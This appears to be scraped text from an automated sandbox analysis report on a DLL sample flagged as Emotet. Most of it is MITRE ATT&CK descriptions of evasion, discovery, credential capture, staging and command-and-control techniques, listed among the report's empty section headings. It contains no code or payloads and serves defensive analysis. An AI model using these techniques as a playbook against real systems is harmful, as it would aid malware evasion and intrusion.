Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report hPJnda9rBy.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Function 0087EFDD, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Function 0088061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Function 00868636, Relevance: 39.9, Strings: 31, Instructions: 1175
COMMONCrypto

Function 0086A871, Relevance: 24.4, Strings: 19, Instructions: 646
COMMONCrypto

Function 00870F86, Relevance: 23.2, Strings: 18, Instructions: 723
COMMONCrypto

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre